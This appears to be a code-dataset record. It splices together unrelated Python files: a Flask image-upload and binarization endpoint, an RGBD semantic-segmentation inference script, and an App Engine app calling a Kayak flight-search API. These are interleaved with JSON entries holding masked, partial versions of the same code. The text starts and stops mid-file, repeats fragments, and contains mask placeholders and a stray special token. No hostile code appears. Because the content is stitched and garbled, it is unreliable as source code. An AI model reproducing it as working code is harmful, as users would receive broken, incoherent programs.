print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[
'UPLOAD_FOLDER']))
binarization = Binarizacion(f'./public/files/{file_name}')
binarization.binaryImage()
binarization.otsuImage()
binarization.adatativeImage()
binarization.fondoMorfologico()
m, color, diametro, pre = binarization.analize()
return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',
'm': m, 'color': color, 'diametro': diametro, 'pre': pre})
return json.dumps({'ok': False})
<|reserved_special_token_1|>
import json
import os
from flask import Flask, request, url_for
from flask_cors import CORS
from werkzeug.utils import secure_filename
from service.Binarizacion import Binarizacion
UPLOAD_FOLDER = './public/files'
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
CORS(app)
@app.route('/')
def hello():
return 'Hello word'
@app.route('/analyze', methods=['POST'])
def analyze():
if request.method == 'POST':
image_file = request.files['image']
file_name = secure_filename(image_file.filename)
# image_file.save('./public/files/' + secure_filename(image_file.filename))
image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))
print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config['UPLOAD_FOLDER']))
binarization = Binarizacion(f'./public/files/{file_name}')
binarization.binaryImage()
binarization.otsuImage()
binarization.adatativeImage()
binarization.fondoMorfologico()
m, color, diametro, pre = binarization.analize()
return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',
'm': m,
'color': color,
'diametro': diametro,
'pre': pre})
return json.dumps({'ok': False})
|
flexible
|
{
"blob_id": "b9c8689dbdf451e6a981f1abdae55771266fe231",
"index": 9129,
"step-1": "<mask token>\n\n\[email protected]('/')\ndef hello():\n return 'Hello word'\n\n\[email protected]('/analyze', methods=['POST'])\ndef analyze():\n if request.method == 'POST':\n image_file = request.files['image']\n file_name = secure_filename(image_file.filename)\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))\n print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[\n 'UPLOAD_FOLDER']))\n binarization = Binarizacion(f'./public/files/{file_name}')\n binarization.binaryImage()\n binarization.otsuImage()\n binarization.adatativeImage()\n binarization.fondoMorfologico()\n m, color, diametro, pre = binarization.analize()\n return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',\n 'm': m, 'color': color, 'diametro': diametro, 'pre': pre})\n return json.dumps({'ok': False})\n",
"step-2": "<mask token>\nCORS(app)\n\n\[email protected]('/')\ndef hello():\n return 'Hello word'\n\n\[email protected]('/analyze', methods=['POST'])\ndef analyze():\n if request.method == 'POST':\n image_file = request.files['image']\n file_name = secure_filename(image_file.filename)\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))\n print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[\n 'UPLOAD_FOLDER']))\n binarization = Binarizacion(f'./public/files/{file_name}')\n binarization.binaryImage()\n binarization.otsuImage()\n binarization.adatativeImage()\n binarization.fondoMorfologico()\n m, color, diametro, pre = binarization.analize()\n return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',\n 'm': m, 'color': color, 'diametro': diametro, 'pre': pre})\n return json.dumps({'ok': False})\n",
"step-3": "<mask token>\nUPLOAD_FOLDER = './public/files'\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\nCORS(app)\n\n\[email protected]('/')\ndef hello():\n return 'Hello word'\n\n\[email protected]('/analyze', methods=['POST'])\ndef analyze():\n if request.method == 'POST':\n image_file = request.files['image']\n file_name = secure_filename(image_file.filename)\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))\n print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[\n 'UPLOAD_FOLDER']))\n binarization = Binarizacion(f'./public/files/{file_name}')\n binarization.binaryImage()\n binarization.otsuImage()\n binarization.adatativeImage()\n binarization.fondoMorfologico()\n m, color, diametro, pre = binarization.analize()\n return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',\n 'm': m, 'color': color, 'diametro': diametro, 'pre': pre})\n return json.dumps({'ok': False})\n",
"step-4": "import json\nimport os\nfrom flask import Flask, request, url_for\nfrom flask_cors import CORS\nfrom werkzeug.utils import secure_filename\nfrom service.Binarizacion import Binarizacion\nUPLOAD_FOLDER = './public/files'\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\nCORS(app)\n\n\[email protected]('/')\ndef hello():\n return 'Hello word'\n\n\[email protected]('/analyze', methods=['POST'])\ndef analyze():\n if request.method == 'POST':\n image_file = request.files['image']\n file_name = secure_filename(image_file.filename)\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))\n print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[\n 'UPLOAD_FOLDER']))\n binarization = Binarizacion(f'./public/files/{file_name}')\n binarization.binaryImage()\n binarization.otsuImage()\n binarization.adatativeImage()\n binarization.fondoMorfologico()\n m, color, diametro, pre = binarization.analize()\n return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',\n 'm': m, 'color': color, 'diametro': diametro, 'pre': pre})\n return json.dumps({'ok': False})\n",
"step-5": "import json\nimport os\n\nfrom flask import Flask, request, url_for\nfrom flask_cors import CORS\nfrom werkzeug.utils import secure_filename\n\nfrom service.Binarizacion import Binarizacion\n\nUPLOAD_FOLDER = './public/files'\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nCORS(app)\n\[email protected]('/')\ndef hello():\n return 'Hello word'\n\[email protected]('/analyze', methods=['POST'])\ndef analyze():\n if request.method == 'POST':\n image_file = request.files['image']\n file_name = secure_filename(image_file.filename)\n # image_file.save('./public/files/' + secure_filename(image_file.filename))\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))\n \n print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config['UPLOAD_FOLDER']))\n binarization = Binarizacion(f'./public/files/{file_name}')\n binarization.binaryImage()\n binarization.otsuImage()\n binarization.adatativeImage()\n binarization.fondoMorfologico()\n \n m, color, diametro, pre = binarization.analize()\n \n return json.dumps({'ok': True, 'url': f'./public/files/{file_name}',\n 'm': m,\n 'color': color,\n 'diametro': diametro,\n 'pre': pre})\n \n return json.dumps({'ok': False})\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
"""
.. codeauthor:: Daniel Seichter <[email protected]>
"""
import argparse
from glob import glob
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
import torch
import torch.nn.functional as F
from src.args import ArgumentParserRGBDSegmentation
from src.build_model import build_model
from src.prepare_data import prepare_data
HOME = os.environ["HOME"]
def _load_img(fp):
img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)
if img.ndim == 3:
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
return img
if __name__ == "__main__":
# arguments
parser = ArgumentParserRGBDSegmentation(
description="Efficient RGBD Indoor Sematic Segmentation (Inference)",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--data_root",
type=str,
default=HOME + "/bags/june_25th/kinect_rgbd_person_act",
help="Root dir to the data where color images are given by {data_root}/color and depth images are given by {data_root}/depth",
)
parser.set_common_args()
parser.add_argument(
"--ckpt_path",
type=str,
default="trained_models/nyuv2/r34_NBt1D_scenenet.pth",
# default="trained_models/sunrgbd/r34_NBt1D.pth",
help="Path to the checkpoint of the trained model.",
)
parser.add_argument(
"--depth_scale",
type=float,
default=1.0,
help="Additional depth scaling factor to apply.",
)
args = parser.parse_args()
# dataset
# TODO: set dataset to be sunrgbd
# args.dataset = "sunrgbd"
args.pretrained_on_imagenet = False # we are loading other weights anyway
dataset, preprocessor = prepare_data(args, with_input_orig=True)
n_classes = dataset.n_classes_without_void
# model and checkpoint loading
model, device = build_model(args, n_classes=n_classes)
checkpoint = torch.load(args.ckpt_path, map_location=lambda storage, loc: storage)
model.load_state_dict(checkpoint["state_dict"])
print("Loaded checkpoint from {}".format(args.ckpt_path))
model.eval()
model.to(device)
# get samples
rgb_filepaths = sorted(glob(os.path.join(args.data_root, "color/*.jpg")))
depth_filepaths = sorted(glob(os.path.join(args.data_root, "depth/*.png")))
assert args.modality == "rgbd", "Only RGBD inference supported so far"
assert len(rgb_filepaths) == len(depth_filepaths)
filepaths = zip(rgb_filepaths, depth_filepaths)
# inference
for fp_rgb, fp_depth in filepaths:
# load sample
img_rgb = _load_img(fp_rgb)
img_depth = _load_img(fp_depth).astype("float32") * args.depth_scale
h, w, _ = img_rgb.shape
# preprocess sample
sample = preprocessor({"image": img_rgb, "depth": img_depth})
# add batch axis and copy to device
image = sample["image"][None].to(device)
depth = sample["depth"][None].to(device)
# apply network
pred = model(image, depth)
pred = F.interpolate(pred, (h, w), mode="bilinear", align_corners=False)
pred = torch.argmax(pred, dim=1)
pred = pred.cpu().numpy().squeeze().astype(np.uint8)
# show result
pred_colored = dataset.color_label(pred, with_void=False)
fig, axs = plt.subplots(1, 3, figsize=(16, 3))
[ax.set_axis_off() for ax in axs.ravel()]
axs[0].imshow(img_rgb)
axs[1].imshow(img_depth, cmap="gray")
axs[2].imshow(pred_colored)
plt.suptitle(
f"Image: ({os.path.basename(fp_rgb)}, "
f"{os.path.basename(fp_depth)}), Model: {args.ckpt_path}"
)
# plt.savefig('./result.jpg', dpi=150)
plt.show()
|
normal
|
{
"blob_id": "559e46aa4e9b55f8c01acf30fa01e106ab914116",
"index": 5687,
"step-1": "<mask token>\n\n\ndef _load_img(fp):\n img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)\n if img.ndim == 3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _load_img(fp):\n img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)\n if img.ndim == 3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\n\nif __name__ == '__main__':\n parser = ArgumentParserRGBDSegmentation(description=\n 'Efficient RGBD Indoor Sematic Segmentation (Inference)',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--data_root', type=str, default=HOME +\n '/bags/june_25th/kinect_rgbd_person_act', help=\n 'Root dir to the data where color images are given by {data_root}/color and depth images are given by {data_root}/depth'\n )\n parser.set_common_args()\n parser.add_argument('--ckpt_path', type=str, default=\n 'trained_models/nyuv2/r34_NBt1D_scenenet.pth', help=\n 'Path to the checkpoint of the trained model.')\n parser.add_argument('--depth_scale', type=float, default=1.0, help=\n 'Additional depth scaling factor to apply.')\n args = parser.parse_args()\n args.pretrained_on_imagenet = False\n dataset, preprocessor = prepare_data(args, with_input_orig=True)\n n_classes = dataset.n_classes_without_void\n model, device = build_model(args, n_classes=n_classes)\n checkpoint = torch.load(args.ckpt_path, map_location=lambda storage,\n loc: storage)\n model.load_state_dict(checkpoint['state_dict'])\n print('Loaded checkpoint from {}'.format(args.ckpt_path))\n model.eval()\n model.to(device)\n rgb_filepaths = sorted(glob(os.path.join(args.data_root, 'color/*.jpg')))\n depth_filepaths = sorted(glob(os.path.join(args.data_root, 'depth/*.png')))\n assert args.modality == 'rgbd', 'Only RGBD inference supported so far'\n assert len(rgb_filepaths) == len(depth_filepaths)\n filepaths = zip(rgb_filepaths, depth_filepaths)\n for fp_rgb, fp_depth in filepaths:\n img_rgb = _load_img(fp_rgb)\n img_depth = _load_img(fp_depth).astype('float32') * args.depth_scale\n h, w, _ = img_rgb.shape\n sample = preprocessor({'image': img_rgb, 'depth': img_depth})\n image = sample['image'][None].to(device)\n depth = sample['depth'][None].to(device)\n pred = model(image, depth)\n pred = F.interpolate(pred, (h, w), mode='bilinear', align_corners=False\n )\n pred = torch.argmax(pred, dim=1)\n pred = pred.cpu().numpy().squeeze().astype(np.uint8)\n pred_colored = dataset.color_label(pred, with_void=False)\n fig, axs = plt.subplots(1, 3, figsize=(16, 3))\n [ax.set_axis_off() for ax in axs.ravel()]\n axs[0].imshow(img_rgb)\n axs[1].imshow(img_depth, cmap='gray')\n axs[2].imshow(pred_colored)\n plt.suptitle(\n f'Image: ({os.path.basename(fp_rgb)}, {os.path.basename(fp_depth)}), Model: {args.ckpt_path}'\n )\n plt.show()\n",
"step-3": "<mask token>\nHOME = os.environ['HOME']\n\n\ndef _load_img(fp):\n img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)\n if img.ndim == 3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\n\nif __name__ == '__main__':\n parser = ArgumentParserRGBDSegmentation(description=\n 'Efficient RGBD Indoor Sematic Segmentation (Inference)',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--data_root', type=str, default=HOME +\n '/bags/june_25th/kinect_rgbd_person_act', help=\n 'Root dir to the data where color images are given by {data_root}/color and depth images are given by {data_root}/depth'\n )\n parser.set_common_args()\n parser.add_argument('--ckpt_path', type=str, default=\n 'trained_models/nyuv2/r34_NBt1D_scenenet.pth', help=\n 'Path to the checkpoint of the trained model.')\n parser.add_argument('--depth_scale', type=float, default=1.0, help=\n 'Additional depth scaling factor to apply.')\n args = parser.parse_args()\n args.pretrained_on_imagenet = False\n dataset, preprocessor = prepare_data(args, with_input_orig=True)\n n_classes = dataset.n_classes_without_void\n model, device = build_model(args, n_classes=n_classes)\n checkpoint = torch.load(args.ckpt_path, map_location=lambda storage,\n loc: storage)\n model.load_state_dict(checkpoint['state_dict'])\n print('Loaded checkpoint from {}'.format(args.ckpt_path))\n model.eval()\n model.to(device)\n rgb_filepaths = sorted(glob(os.path.join(args.data_root, 'color/*.jpg')))\n depth_filepaths = sorted(glob(os.path.join(args.data_root, 'depth/*.png')))\n assert args.modality == 'rgbd', 'Only RGBD inference supported so far'\n assert len(rgb_filepaths) == len(depth_filepaths)\n filepaths = zip(rgb_filepaths, depth_filepaths)\n for fp_rgb, fp_depth in filepaths:\n img_rgb = _load_img(fp_rgb)\n img_depth = _load_img(fp_depth).astype('float32') * args.depth_scale\n h, w, _ = img_rgb.shape\n sample = preprocessor({'image': img_rgb, 'depth': img_depth})\n image = sample['image'][None].to(device)\n depth = sample['depth'][None].to(device)\n pred = model(image, depth)\n pred = F.interpolate(pred, (h, w), mode='bilinear', align_corners=False\n )\n pred = torch.argmax(pred, dim=1)\n pred = pred.cpu().numpy().squeeze().astype(np.uint8)\n pred_colored = dataset.color_label(pred, with_void=False)\n fig, axs = plt.subplots(1, 3, figsize=(16, 3))\n [ax.set_axis_off() for ax in axs.ravel()]\n axs[0].imshow(img_rgb)\n axs[1].imshow(img_depth, cmap='gray')\n axs[2].imshow(pred_colored)\n plt.suptitle(\n f'Image: ({os.path.basename(fp_rgb)}, {os.path.basename(fp_depth)}), Model: {args.ckpt_path}'\n )\n plt.show()\n",
"step-4": "<mask token>\nimport argparse\nfrom glob import glob\nimport os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn.functional as F\nfrom src.args import ArgumentParserRGBDSegmentation\nfrom src.build_model import build_model\nfrom src.prepare_data import prepare_data\nHOME = os.environ['HOME']\n\n\ndef _load_img(fp):\n img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)\n if img.ndim == 3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\n\nif __name__ == '__main__':\n parser = ArgumentParserRGBDSegmentation(description=\n 'Efficient RGBD Indoor Sematic Segmentation (Inference)',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--data_root', type=str, default=HOME +\n '/bags/june_25th/kinect_rgbd_person_act', help=\n 'Root dir to the data where color images are given by {data_root}/color and depth images are given by {data_root}/depth'\n )\n parser.set_common_args()\n parser.add_argument('--ckpt_path', type=str, default=\n 'trained_models/nyuv2/r34_NBt1D_scenenet.pth', help=\n 'Path to the checkpoint of the trained model.')\n parser.add_argument('--depth_scale', type=float, default=1.0, help=\n 'Additional depth scaling factor to apply.')\n args = parser.parse_args()\n args.pretrained_on_imagenet = False\n dataset, preprocessor = prepare_data(args, with_input_orig=True)\n n_classes = dataset.n_classes_without_void\n model, device = build_model(args, n_classes=n_classes)\n checkpoint = torch.load(args.ckpt_path, map_location=lambda storage,\n loc: storage)\n model.load_state_dict(checkpoint['state_dict'])\n print('Loaded checkpoint from {}'.format(args.ckpt_path))\n model.eval()\n model.to(device)\n rgb_filepaths = sorted(glob(os.path.join(args.data_root, 'color/*.jpg')))\n depth_filepaths = sorted(glob(os.path.join(args.data_root, 'depth/*.png')))\n assert args.modality == 'rgbd', 'Only RGBD inference supported so far'\n assert len(rgb_filepaths) == len(depth_filepaths)\n filepaths = zip(rgb_filepaths, depth_filepaths)\n for fp_rgb, fp_depth in filepaths:\n img_rgb = _load_img(fp_rgb)\n img_depth = _load_img(fp_depth).astype('float32') * args.depth_scale\n h, w, _ = img_rgb.shape\n sample = preprocessor({'image': img_rgb, 'depth': img_depth})\n image = sample['image'][None].to(device)\n depth = sample['depth'][None].to(device)\n pred = model(image, depth)\n pred = F.interpolate(pred, (h, w), mode='bilinear', align_corners=False\n )\n pred = torch.argmax(pred, dim=1)\n pred = pred.cpu().numpy().squeeze().astype(np.uint8)\n pred_colored = dataset.color_label(pred, with_void=False)\n fig, axs = plt.subplots(1, 3, figsize=(16, 3))\n [ax.set_axis_off() for ax in axs.ravel()]\n axs[0].imshow(img_rgb)\n axs[1].imshow(img_depth, cmap='gray')\n axs[2].imshow(pred_colored)\n plt.suptitle(\n f'Image: ({os.path.basename(fp_rgb)}, {os.path.basename(fp_depth)}), Model: {args.ckpt_path}'\n )\n plt.show()\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\n.. codeauthor:: Daniel Seichter <[email protected]>\n\"\"\"\nimport argparse\nfrom glob import glob\nimport os\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn.functional as F\n\nfrom src.args import ArgumentParserRGBDSegmentation\nfrom src.build_model import build_model\nfrom src.prepare_data import prepare_data\n\nHOME = os.environ[\"HOME\"]\n\n\ndef _load_img(fp):\n img = cv2.imread(fp, cv2.IMREAD_UNCHANGED)\n if img.ndim == 3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n return img\n\n\nif __name__ == \"__main__\":\n # arguments\n parser = ArgumentParserRGBDSegmentation(\n description=\"Efficient RGBD Indoor Sematic Segmentation (Inference)\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\n \"--data_root\",\n type=str,\n default=HOME + \"/bags/june_25th/kinect_rgbd_person_act\",\n help=\"Root dir to the data where color images are given by {data_root}/color and depth images are given by {data_root}/depth\",\n )\n parser.set_common_args()\n parser.add_argument(\n \"--ckpt_path\",\n type=str,\n default=\"trained_models/nyuv2/r34_NBt1D_scenenet.pth\",\n # default=\"trained_models/sunrgbd/r34_NBt1D.pth\",\n help=\"Path to the checkpoint of the trained model.\",\n )\n parser.add_argument(\n \"--depth_scale\",\n type=float,\n default=1.0,\n help=\"Additional depth scaling factor to apply.\",\n )\n args = parser.parse_args()\n\n # dataset\n # TODO: set dataset to be sunrgbd\n # args.dataset = \"sunrgbd\"\n args.pretrained_on_imagenet = False # we are loading other weights anyway\n dataset, preprocessor = prepare_data(args, with_input_orig=True)\n n_classes = dataset.n_classes_without_void\n\n # model and checkpoint loading\n model, device = build_model(args, n_classes=n_classes)\n checkpoint = torch.load(args.ckpt_path, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpoint[\"state_dict\"])\n print(\"Loaded checkpoint from {}\".format(args.ckpt_path))\n\n model.eval()\n model.to(device)\n\n # get samples\n rgb_filepaths = sorted(glob(os.path.join(args.data_root, \"color/*.jpg\")))\n depth_filepaths = sorted(glob(os.path.join(args.data_root, \"depth/*.png\")))\n assert args.modality == \"rgbd\", \"Only RGBD inference supported so far\"\n assert len(rgb_filepaths) == len(depth_filepaths)\n filepaths = zip(rgb_filepaths, depth_filepaths)\n\n # inference\n for fp_rgb, fp_depth in filepaths:\n # load sample\n img_rgb = _load_img(fp_rgb)\n img_depth = _load_img(fp_depth).astype(\"float32\") * args.depth_scale\n h, w, _ = img_rgb.shape\n\n # preprocess sample\n sample = preprocessor({\"image\": img_rgb, \"depth\": img_depth})\n\n # add batch axis and copy to device\n image = sample[\"image\"][None].to(device)\n depth = sample[\"depth\"][None].to(device)\n\n # apply network\n pred = model(image, depth)\n pred = F.interpolate(pred, (h, w), mode=\"bilinear\", align_corners=False)\n pred = torch.argmax(pred, dim=1)\n pred = pred.cpu().numpy().squeeze().astype(np.uint8)\n\n # show result\n pred_colored = dataset.color_label(pred, with_void=False)\n fig, axs = plt.subplots(1, 3, figsize=(16, 3))\n [ax.set_axis_off() for ax in axs.ravel()]\n axs[0].imshow(img_rgb)\n axs[1].imshow(img_depth, cmap=\"gray\")\n axs[2].imshow(pred_colored)\n\n plt.suptitle(\n f\"Image: ({os.path.basename(fp_rgb)}, \"\n f\"{os.path.basename(fp_depth)}), Model: {args.ckpt_path}\"\n )\n # plt.savefig('./result.jpg', dpi=150)\n plt.show()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import os
import re
import logging
import time
from string import replace
from settings import *
import wsgiref.handlers
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from modules.xml2dict import *
from modules import kayak
from modules.messaging import *
from modules.cron import *
kayak = kayak.Kayak(
SETTINGS['Kayak']['API_TOKEN'],
SETTINGS['Kayak']['BASE_URL'],
)
class MainHandler(webapp.RequestHandler):
def get(self):
pass
'''
messages = twitter.statuses.mentions()
mydict = {'messages':{}}
counter = 0
for message in messages:
mydict['messages'][('%s' % counter)] = message
counter += 1
path = os.path.join(os.path.dirname(__file__), 'templates/index.html')
self.response.out.write(template.render(path, mydict))
'''
class CronHandler(webapp.RequestHandler):
def get(self):
cron = Cron()
cron.init_scheduler()
cron.run()
class KayakApi(webapp.RequestHandler):
def get(self):
messaging = Messaging()
messaging.collect_messages()
messaging.process_messages()
kayak_session = kayak.get_session()
logging.debug(kayak_session.content)
session_id = re.search('<sid>(.*?)</sid>', kayak_session.content)
session_id = session_id.group(1)
kayak.session_id = session_id
kayak.headers = { 'Cookie' : kayak_session.headers['set-cookie'] }
kayak_search = kayak.post_search(
messaging.mentions['from'],
messaging.mentions['to'],
messaging.mentions['departure']['day'] + '/' + messaging.mentions['departure']['month'] + '/' + messaging.mentions['departure']['year'],
messaging.mentions['retour']['day'] + '/' + messaging.mentions['retour']['month'] + '/' + messaging.mentions['retour']['year']
)
logging.debug(kayak_search.content)
search_id = re.search('<searchid>(.*?)</searchid>', kayak_search.content)
search_id = search_id.group(1)
kayak.search_id = search_id
kayak_results = kayak.get_results()
logging.debug(kayak_results.content)
result_set = ''
more_pending = re.search('<morepending>true</morepending>', kayak_results.content)
if more_pending.group(0) is not None:
more_pending = True
if more_pending:
time.sleep(10)
kayak_results = kayak.get_results()
result_set = kayak_results.content
logging.debug(kayak_results.content)
content = replace(result_set, '&', '&')
xml = XML2Dict()
trips = xml.fromstring(content)
trip_dict = {'trips' : trips}
path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')
self.response.out.write(template.render(path, trip_dict))
class KayakHandler(webapp.RequestHandler):
def get(self):
file = open('kayak-result.xml','r')
content = file.read()
content = replace(content, '&', '&')
xml = XML2Dict()
trips = xml.fromstring(content)
trip_dict = {'trips' : trips}
'''
xml = ET.fromstring(content)
trips = xml.findall("trips/trip")
trip_dict = {'trips' : trips}
'''
path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')
self.response.out.write(template.render(path, trip_dict))
class ClearTripHandler(webapp.RequestHandler):
def get(self):
file = open('result.xml','r')
content = file.read()
content = replace(content, '&', '&')
xml = XML2Dict()
trips = xml.fromstring(content)
trip_dict = {'trips' : trips}
'''
xml = ET.fromstring(content)
trips = xml.findall("trips/trip")
trip_dict = {'trips' : trips}
'''
path = os.path.join(os.path.dirname(__file__), 'templates/cleartrip.html')
self.response.out.write(template.render(path, trip_dict))
class MessageParser(webapp.RequestHandler):
def get(self):
messaging = Messaging()
messaging.collect_messages()
messaging.process_messages()
self.response.out.write(messaging.mentions)
def main():
logging.getLogger().setLevel(logging.DEBUG)
application = webapp.WSGIApplication([
('/', MainHandler),
('/kayak', KayakHandler),
('/cleartrip', ClearTripHandler),
('/cron', CronHandler),
('/api/kayak', KayakApi),
('/messaging', MessageParser),
], debug=True)
wsgiref.handlers.CGIHandler().run(application)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "08568c31e5a404957c11eca9cbc9472c71cf088b",
"index": 9546,
"step-1": "<mask token>\n\n\nclass KayakHandler(webapp.RequestHandler):\n <mask token>\n\n\nclass ClearTripHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('result.xml', 'r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n \"\"\"\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__),\n 'templates/cleartrip.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass MessageParser(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n self.response.out.write(messaging.mentions)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass KayakApi(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n kayak_session = kayak.get_session()\n logging.debug(kayak_session.content)\n session_id = re.search('<sid>(.*?)</sid>', kayak_session.content)\n session_id = session_id.group(1)\n kayak.session_id = session_id\n kayak.headers = {'Cookie': kayak_session.headers['set-cookie']}\n kayak_search = kayak.post_search(messaging.mentions['from'],\n messaging.mentions['to'], messaging.mentions['departure']['day'\n ] + '/' + messaging.mentions['departure']['month'] + '/' +\n messaging.mentions['departure']['year'], messaging.mentions[\n 'retour']['day'] + '/' + messaging.mentions['retour']['month'] +\n '/' + messaging.mentions['retour']['year'])\n logging.debug(kayak_search.content)\n search_id = re.search('<searchid>(.*?)</searchid>', kayak_search.\n content)\n search_id = search_id.group(1)\n kayak.search_id = search_id\n kayak_results = kayak.get_results()\n logging.debug(kayak_results.content)\n result_set = ''\n more_pending = re.search('<morepending>true</morepending>',\n kayak_results.content)\n if more_pending.group(0) is not None:\n more_pending = True\n if more_pending:\n time.sleep(10)\n kayak_results = kayak.get_results()\n result_set = kayak_results.content\n logging.debug(kayak_results.content)\n content = replace(result_set, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass KayakHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('kayak-result.xml', 'r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n \"\"\"\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass ClearTripHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('result.xml', 'r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n \"\"\"\n xml = ET.fromstring(content)\n trips = xml.findall(\"trips/trip\")\n trip_dict = {'trips' : trips}\n \"\"\"\n path = os.path.join(os.path.dirname(__file__),\n 'templates/cleartrip.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass MessageParser(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n self.response.out.write(messaging.mentions)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CronHandler(webapp.RequestHandler):\n <mask token>\n\n\nclass KayakApi(webapp.RequestHandler):\n\n def get(self):\n messaging = Messaging()\n messaging.collect_messages()\n messaging.process_messages()\n kayak_session = kayak.get_session()\n logging.debug(kayak_session.content)\n session_id = re.search('<sid>(.*?)</sid>', kayak_session.content)\n session_id = session_id.group(1)\n kayak.session_id = session_id\n kayak.headers = {'Cookie': kayak_session.headers['set-cookie']}\n kayak_search = kayak.post_search(messaging.mentions['from'],\n messaging.mentions['to'], messaging.mentions['departure']['day'\n ] + '/' + messaging.mentions['departure']['month'] + '/' +\n messaging.mentions['departure']['year'], messaging.mentions[\n 'retour']['day'] + '/' + messaging.mentions['retour']['month'] +\n '/' + messaging.mentions['retour']['year'])\n logging.debug(kayak_search.content)\n search_id = re.search('<searchid>(.*?)</searchid>', kayak_search.\n content)\n search_id = search_id.group(1)\n kayak.search_id = search_id\n kayak_results = kayak.get_results()\n logging.debug(kayak_results.content)\n result_set = ''\n more_pending = re.search('<morepending>true</morepending>',\n kayak_results.content)\n if more_pending.group(0) is not None:\n more_pending = True\n if more_pending:\n time.sleep(10)\n kayak_results = kayak.get_results()\n result_set = kayak_results.content\n logging.debug(kayak_results.content)\n content = replace(result_set, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = {'trips': trips}\n path = os.path.join(os.path.dirname(__file__), 'templates/kayak.html')\n self.response.out.write(template.render(path, trip_dict))\n\n\nclass KayakHandler(webapp.RequestHandler):\n\n def get(self):\n file = open('kayak-result.xml', 'r')\n content = file.read()\n content = replace(content, '&', '&')\n xml = XML2Dict()\n trips = xml.fromstring(content)\n trip_dict = 